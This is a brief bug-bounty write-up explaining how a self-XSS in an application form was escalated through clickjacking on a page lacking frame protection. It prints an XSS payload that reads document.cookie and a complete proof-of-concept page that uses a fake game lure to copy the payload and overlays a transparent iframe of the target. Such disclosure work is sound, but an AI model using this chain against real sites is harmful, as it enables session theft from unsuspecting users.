Self XSS to Good XSS Clickjacking

Severity : High

Complexity: Easy

Weakness: Cross Site Scripting

• While Testing one of the Private on HackerOne , I Land up on the following page.

https://sub.site.com/application/request/form

• Page contain’s Form To submit the detail’s of their application .

‘>“/><svg/onload=prompt(document.cookie)>

As soon as i started entering Payload in this Field , Pop up Appear’s .

Self-XSS

Since Form is Vulnerable to Self XSS ,But Plus Point was There was No X-Frame-Header or Click-jacking Protection . Which Make’s the Attack Easier And Converted it to Well Working XSS on Other User’s .

Simple Demo POC:

<html>
<head><title>Poc</title></head>
<body>
<h1>Welcome to Click Games</h1>
Message :<input id="copy-text" type="text" value='"/><svg/onload=prompt(document.domain)>"'>
<br><br><br>
<script>
document.getElementById("copy-text").onclick = function(){
this.select();
document.execCommand('copy');
alert("You'r Game Begins!")
}
</script>
<style>
iframe {
width: 600px;
height: 450px;
position: absolute;
top: 0; right: 10;
filter: alpha(opacity=50);
opacity: 0.1;
}
</style>
<iframe src="https://sub.site.com/application/request/form"></iframe>
</body>
</html>